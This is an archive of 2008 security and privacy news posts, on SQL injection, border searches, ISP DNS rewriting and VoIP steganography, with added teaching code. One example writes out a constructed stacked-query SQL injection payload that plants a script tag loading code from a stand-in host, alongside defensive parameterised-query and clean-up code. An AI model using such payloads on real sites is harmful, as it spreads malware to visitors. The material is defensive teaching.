Tuesday, April 29, 2008

Half a Million Microsoft-Powered Sites Hit With SQL Injection

Slashdot posted a link yesterday to an article about a recent mass SQL injection attack on roughly 500,000 websites. The common factor appears to be sites hosted on Microsoft's IIS web server with a Microsoft SQL Server back end; the weakness being exploited is in the sites' own web applications, which pass unvalidated input straight into SQL queries, not in IIS itself.

The injected SQL appends a script tag to every text field in the site's database. Whenever one of those fields is rendered into a web page, the visitor's browser fetches the referenced script, which in turn attempts to compromise the visitor's PC. Until the tainted rows are cleaned up and the injection point closed, the site keeps serving the attack to every visitor.
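The pattern behind the attack and the two things a site owner needs to do about it, as an added example that is not part of the original post or of the reported attack: a query built by string concatenation lets a stacked UPDATE ride along and append a script tag to every text column, a parameterised query binds the same input as a plain value, and a scan over all text columns finds the rows that need cleaning. The payload, the script URL (example.invalid) and the products table are constructed for illustration; the real campaign walked the SQL Server system catalog to reach every table, which is not reproduced here. SQLite stands in for SQL Server because its executescript() runs stacked statements the same way.

```python
"""Vulnerable vs. parameterised query, plus a scan for injected script tags."""
import re
import sqlite3

# Constructed stand-in for the injected tag. The real campaign's script
# URL is deliberately not reproduced here.
INJECTED_TAG = "<script src=http://example.invalid/x.js></script>"

# Constructed payload in the spirit of the attack: a stacked UPDATE that
# appends the tag to every text column of a table, then comments out
# whatever followed the injection point in the original statement.
PAYLOAD = (
    "1; UPDATE products SET name = name || '%s', "
    "description = description || '%s'; --" % (INJECTED_TAG, INJECTED_TAG)
)

SCRIPT_RE = re.compile(r"<script\b", re.IGNORECASE)


def build_db():
    """In-memory database with a couple of rows of sample content."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
        INSERT INTO products (name, description) VALUES ('Widget', 'A small widget');
        INSERT INTO products (name, description) VALUES ('Gadget', 'A large gadget');
        """
    )
    return conn


def lookup_vulnerable(conn, product_id):
    """Classic mistake: untrusted input pasted into the statement text.

    executescript() runs stacked statements, which is what lets the
    injected UPDATE ride along with the SELECT the developer intended.
    """
    sql = "SELECT name FROM products WHERE id = %s" % product_id
    conn.executescript(sql)  # the SELECT result is discarded; the UPDATE is not


def lookup_safe(conn, product_id):
    """Parameterised query: the input is bound as a value, never parsed as SQL."""
    cur = conn.execute("SELECT name FROM products WHERE id = ?", (product_id,))
    return [row[0] for row in cur.fetchall()]


def find_injected_cells(conn):
    """Scan every TEXT column of every table for a script tag.

    Returns (table, column, rowid) triples, which is the list a clean-up
    job needs; searching the rendered HTML alone would miss fields that
    are only shown on some pages.
    """
    hits = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        cols = [c[1] for c in conn.execute('PRAGMA table_info("%s")' % table)
                if c[2].upper() == "TEXT"]
        for col in cols:
            rows = conn.execute(
                'SELECT rowid, "%s" FROM "%s"' % (col, table)).fetchall()
            for rowid, value in rows:
                if value and SCRIPT_RE.search(value):
                    hits.append((table, col, rowid))
    return hits


if __name__ == "__main__":
    db = build_db()
    print("safe lookup with payload:", lookup_safe(db, PAYLOAD))
    print("tainted cells before:", find_injected_cells(db))
    lookup_vulnerable(db, PAYLOAD)
    print("tainted cells after:", find_injected_cells(db))
```

The safe lookup returns nothing for the payload because the whole string is compared against the integer id column; in a real application the id should also be validated as an integer before it reaches the database. Note that the scan only finds the rows to repair; restoring them from a known-good backup and fixing the query that let the UPDATE in are both still required, otherwise the next sweep of the attack simply re-infects the cleaned rows.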

According to Bill Sisk, Microsoft's Trustworthy Computing Response Communications Manager:
"Anyone believed to have been affected can visit: http://www.microsoft.com/protect/support/default.mspx and should contact the national law enforcement agency in their country. Those in the United States can contact Customer Service and Support at no charge using the PC Safety hotline at 1-866-PCSAFETY. Additionally, customers in the United States should contact their local FBI office or report their situation at: www.ic3.gov."

For details, see WIRED.

Monday, April 28, 2008

Companies To Be Liable For Deals With Online Criminals

Slashdot has a backgrounder on new rules issued by the FTC that require any business that handles private consumer data to check both customers and suppliers against databases of known online criminals. The rules take effect in November and will subject companies that do not comply with the requirement to large fines or jail time.
"The final rules require each financial institution and creditor that holds any consumer account, or other account for which there is a reasonably foreseeable risk of identity theft, to develop and implement an Identity Theft Prevention Program for combating identity theft in connection with new and existing accounts," the FTC says in the rules, which were passed last year.

For details, see darkREADING.

Thursday, April 24, 2008

NJ Supreme Court Rules For Internet Privacy

A Slashdot posting on Tuesday notes that the New Jersey Supreme Court has ruled that ISPs may not hand subscriber information to police without proper legal process such as a warrant. The ruling goes further than federal precedent: under the US Supreme Court's third-party doctrine, information a customer voluntarily gives to a business such as an ISP gets no Fourth Amendment protection, but a state court is free to read its own constitution as granting more protection than that federal floor.

Chief Justice Stuart Rabner said in writing for the court:
"We now hold that citizens have a reasonable expectation of privacy protected by Article I ... of the New Jersey Constitution, in the subscriber information they provide to Internet service providers -- just as New Jersey citizens have a privacy interest in their bank records stored by banks and telephone billing records kept by phone companies."
Read the full story at The Star-Ledger.

Wednesday, April 23, 2008

Laptops Can Be Searched At the Border

In a story flagged by Slashdot, the closely watched search-and-seizure case involving the laptop seized from Michael Timothy Arnold by two U.S. Customs and Border Protection officers has ended with the laptop's contents being permitted as evidence against Arnold for transporting child pornography across a national border.

U.S. District Judge Dean Pregerson had ruled the evidence inadmissible, reasoning that electronic storage devices are an extension of a person's memories and thoughts and thus cannot legally be searched without reasonable suspicion. Federal prosecutors appealed and argued successfully that the law allows searches at the nation's border without any particularized suspicion.
"I think it will surprise people that their laptops are subject to search without any level of suspicion when they get to a border checkpoint," said Jennifer Chacon, a law professor at the University of California, Davis.
Chacon warns that travelers carrying laptops with proprietary business information should be aware that a government agent has the right to search computers at the border. See dailybreeze.com for the full article.

Tuesday, April 22, 2008

Major ISPs Injecting Ads, Vulnerabilities Into Web

Several major internet service providers, in their efforts to monetize the web traffic on their networks, may be unintentionally exposing their customers to a greater risk of online attacks from identity thieves, says the Washington Post.

The practice in question is serving ad-filled pages when a customer requests a subdomain of a web site that does not exist (a mistyped hostname, for example). Instead of returning a DNS "no such name" answer, the ISP's resolver returns the address of an ad server. That becomes a security problem when the ISP has outsourced the ad serving to a third party, because that third party's servers now answer for hostnames inside other organizations' domains.

These findings come from IOActive security researcher Dan Kaminsky, who found that the advertising servers are impersonating hostnames within trademarked domains.
"We have determined that these injected servers are, in fact, vulnerable to cross-site scripting attacks. Since these servers are being injected into your trademarked domains, their vulnerability can be used to attack your users and your sites," Kaminsky said, identifying EarthLink, Verizon and Qwest among the ISPs.
See Slashdot for more information.
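A check a site owner or a subscriber can run to see whether their resolver rewrites nonexistent names, as an added example that is not part of the original post or of Kaminsky's work: ask for a few random labels under a domain you control and see whether they all resolve to the same address. The two resolver functions standing in for an ISP and for a clean upstream are constructed for the offline demonstration (example.com and the 192.0.2.x addresses are documentation reservations); the system_resolver wrapper is the one to pass in for a live check.

```python
"""Detect ISP NXDOMAIN rewriting: random labels under a domain should not resolve."""
import secrets
import socket


class NXDomain(Exception):
    """Raised by a resolver when the name does not exist."""


def random_label():
    # 16 random hex characters: nobody registers names like this, so an
    # answer for one of them means something is synthesising records.
    return "nx-" + secrets.token_hex(8)


def detect_nxdomain_rewrite(domain, resolve, probes=3):
    """Return the address that nonexistent names resolve to, or None.

    `resolve(name)` returns an IPv4 string or raises NXDomain. Several
    random labels are tried; rewriting is reported only if every one of
    them resolves and they all land on the same address, which is what an
    ad-serving wildcard looks like. A single hit could be a genuine
    wildcard record the domain owner configured on purpose.
    """
    answers = set()
    for _ in range(probes):
        name = "%s.%s" % (random_label(), domain)
        try:
            answers.add(resolve(name))
        except NXDomain:
            return None
    return answers.pop() if len(answers) == 1 else None


def system_resolver(name):
    """Thin wrapper over the OS stub resolver (needs network; not used offline)."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror as exc:
        raise NXDomain(name) from exc


# --- Constructed resolvers standing in for an ISP and for a clean upstream ---

def isp_resolver_with_rewriting(name):
    """Whatever is asked for under example.com 'exists' and points at the ad box."""
    if name.endswith(".example.com"):
        return "192.0.2.10"
    raise NXDomain(name)


def clean_resolver(name):
    """Only the names that really exist get an answer."""
    known = {"www.example.com": "192.0.2.1"}
    if name in known:
        return known[name]
    raise NXDomain(name)


if __name__ == "__main__":
    print("ISP resolver :", detect_nxdomain_rewrite("example.com", isp_resolver_with_rewriting))
    print("clean resolver:", detect_nxdomain_rewrite("example.com", clean_resolver))
```

Why a rewritten host matters for the domain owner: the ad server answers as a host under the owner's own domain, so a page it serves is sent any cookie the owner's site set with a Domain attribute covering the whole domain, and script running on it can read those cookies. An XSS flaw on the ad server is therefore effectively an XSS flaw in the owner's domain, which is the point Kaminsky makes above.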

Monday, April 21, 2008

US Government to Have Only 50 Gateways

The US government plans to cut the approximately 4,000 active internet connections used by its civilian agencies down to roughly 50 hardened gateways under the Trusted Internet Connections (TIC) initiative. The move comes partly in response to the rise in attacks on government networks: with only a few dozen monitored gateways, traffic can actually be inspected and incidents traced.
"Most security professionals agreed that the TIC security improvements and similar measures are long overdue. 'We should have done this five years ago, but there wasn't the heart or the will then like there is now,' said Howard Schmidt, a former White House cyber security adviser. 'The timetable is aggressive,' he said, but now there is a sense of urgency behind the program. Small agencies that won't qualify for their own connections under TIC must subcontract their Internet services to larger agencies."
For more information, see Slashdot.

Friday, April 18, 2008

DHS to Begin Collecting DNA of Anyone Arrested

Slashdot says the AP is reporting that the U.S. will start collecting DNA from every person federal authorities arrest. With authorization from Congress, the federal government also plans to collect DNA samples from foreigners who are detained, whether or not they are ever charged.
"Many innocent lives could have been saved had the government begun this kind of DNA sampling in the 1990s when the technology to do so first became available," Sen. Jon Kyl, R-Ariz., said.
But the new regulation would mean that the federal government could store DNA samples of people who are not guilty of any crime, says Jesselyn McCurdy, legislative counsel for the American Civil Liberties Union.
"Now innocent people's DNA will be put into this huge CODIS database, and it will be very difficult for them to get it out if they are not charged or convicted of a crime," McCurdy said.
See complete article in Yahoo News.

Thursday, April 17, 2008

The New E-spionage Threat

A SANS NewsBites item points to a BusinessWeek investigation of the growing number of targeted attacks on US government and private-industry systems. The example it cites is an email message addressed to a Booz Allen Hamilton executive: a convincing forgery of a mundane list, supposedly sent by the Pentagon, of weaponry India wanted to buy.

Embedded in the message, however, was Poison Ivy, a remote-access trojan, set up to extract sensitive data from the $4 billion consulting firm's network. Had the recipient opened the attachment, his every keystroke would have been reported back to an address registered through an obscure company headquartered on the banks of the Yangtze River. The lure itself contained nothing obviously suspicious; the attack lived entirely in the attachment, which is what makes this class of message so hard to filter.

For more information, see the article in Businessweek.com.

For China's response to the article and to Business Week, see China's Response.

Wednesday, April 16, 2008

US To Employ Overhead Spying Domestically

Slashdot points to a Washington Post article about the Bush administration's announcement last Friday that it will begin using the nation's most advanced spy satellites for domestic purposes.

Homeland Security Secretary Michael Chertoff said his department will activate its new domestic satellite surveillance office in stages, and that sophisticated overhead sensor data will be made available to law enforcement once privacy and civil-rights concerns are resolved.

Congress last October delayed launch of the DHS office that would coordinate law-enforcement requests for satellite and other technical data and demanded answers to legal questions about the program. The administration supplied answers that some Congress members characterized as inadequate.

See the full article at washingtonpost.com.

Wednesday, April 09, 2008

EU Recommends Slashing Search Data Retention

According to Slashdot, the Article 29 Working Party, the body that brings together the EU's national data-protection authorities, has issued a report recommending that search engines retain search data for no more than six months. Google and others have long argued that they need to keep the data to refine search results, prevent click fraud and build new services such as spell check. The working party concluded, however, that IP addresses can be used to identify individuals, if not by the search engine itself then by law enforcement or anyone armed with a subpoena, and so should be treated as personal data.

Peter Fleischer, Google's Global Privacy Counsel, has already responded:
"The findings are another important step in an ongoing dialogue about protecting user privacy online -- a discussion in which Google will continue to be engaged. It's also a debate in which we hope our users will participate,"

Details appear in ars technica.

For full report in .pdf format, see ARTICLE 29 DATA PROTECTION WORKING PARTY.

Tuesday, April 08, 2008

Security Pros Launch Open-Source CERT

Backed by Google, the security consulting firm Inverse Path and the Open Source Lab at Oregon State University have created oCERT (the Open Source Computer Emergency Response Team), intended to be the place to go for security incident response for open-source projects (ACM TechNews).

The team wants to manage advance vulnerability warnings, coordinate patch release notification, offer resources for analyzing and repairing software flaws, and hold sluggish vendors accountable when security fixes are delayed.

"Small open-source projects often don't have any form of security handling but the same code they manage [is] included by bigger projects and distributions. When there's a compromise, there's no proper coordination and that's not acceptable," says Andrea Barisani, oCERT founder and project coordinator.

An excellent article describing the new CERT appears in eWEEK.COM.

Monday, April 07, 2008

Blocking Steganosonic Data in Phone Calls

Slashdot notes that researchers at FH St. Polten are developing ways to block covert data in VoIP and GSM phone calls: by modifying the call's background noise they can invisibly and inaudibly prevent the transmission of data hidden in the audio (see the Google translation of the original German). The defender does not have to detect the hidden channel first; the added noise simply destroys whatever was carried in the bits it overwrites.
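The principle on a toy scale, as an added example that is not part of the original post and not the scheme the FH St. Polten researchers studied: hide a message in the least significant bit of 16-bit PCM samples, then have the defender add one step of dither to every sample. The audio changes by at most one LSB, below anything a listener would notice, but the hidden message is scrambled. The cover signal, the marker bytes and the payload are constructed for the demonstration.

```python
"""LSB embedding in PCM audio, and why re-dithering the noise floor destroys it."""
import random

MAGIC = b"OK"  # short marker so the extractor can tell a hit from garbage


def embed(samples, payload):
    """Hide payload bytes in the least significant bit of successive samples.

    Samples are 16-bit signed PCM values; a new list is returned. This is
    the simplest possible audio steganography, chosen for illustration.
    """
    data = MAGIC + payload
    bits = [(byte >> i) & 1 for byte in data for i in range(7, -1, -1)]
    if len(bits) > len(samples):
        raise ValueError("cover too short for payload")
    out = list(samples)
    for idx, bit in enumerate(bits):
        out[idx] = (out[idx] & ~1) | bit
    return out


def extract(samples, nbytes):
    """Read nbytes of hidden data back; return None if the marker is missing."""
    total = len(MAGIC) + nbytes
    data = bytearray()
    for i in range(total):
        byte = 0
        for bit in samples[i * 8:(i + 1) * 8]:
            byte = (byte << 1) | (bit & 1)
        data.append(byte)
    if data[:len(MAGIC)] != MAGIC:
        return None
    return bytes(data[len(MAGIC):])


def jam(samples, rng):
    """Defender's move: add +/-1 dither to every sample, inaudible at 16 bits.

    Each sample's LSB is flipped with probability 2/3, so any channel that
    lives in the LSB is wiped without the defender knowing it was there.
    """
    return [s + rng.choice((-1, 0, 1)) for s in samples]


def make_cover(n, rng):
    """Constructed stand-in for speech: low-level noise in the 16-bit range."""
    return [rng.randint(-3000, 3000) for _ in range(n)]


def demo():
    """Embed, recover, jam, try to recover again; return what each step gave."""
    rng = random.Random(7)
    cover = make_cover(400, rng)
    secret = b"meet@9"
    stego = embed(cover, secret)
    recovered = extract(stego, len(secret))
    jammed = jam(stego, rng)
    after_jam = extract(jammed, len(secret))
    max_delta = max(abs(a - b) for a, b in zip(stego, jammed))
    return recovered, after_jam, max_delta


if __name__ == "__main__":
    before, after, delta = demo()
    print("recovered before jamming:", before)
    print("recovered after jamming :", after)
    print("largest sample change    :", delta)
```

The same idea scales to the real case: a voice codec already discards fine detail, so re-encoding or re-dithering a call costs nothing audible, while any covert channel riding in those details is lost. The cost is that the defence is indiscriminate; it damages every call, not only the ones carrying hidden data.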

This development recalls hydan, a steganography tool that embeds data directly in an application's executable file without altering its function or file size. It works by choosing between functionally equivalent machine-instruction encodings, so the hidden bits live in which instruction was picked rather than in any extra bytes. For a description of this software see hydan.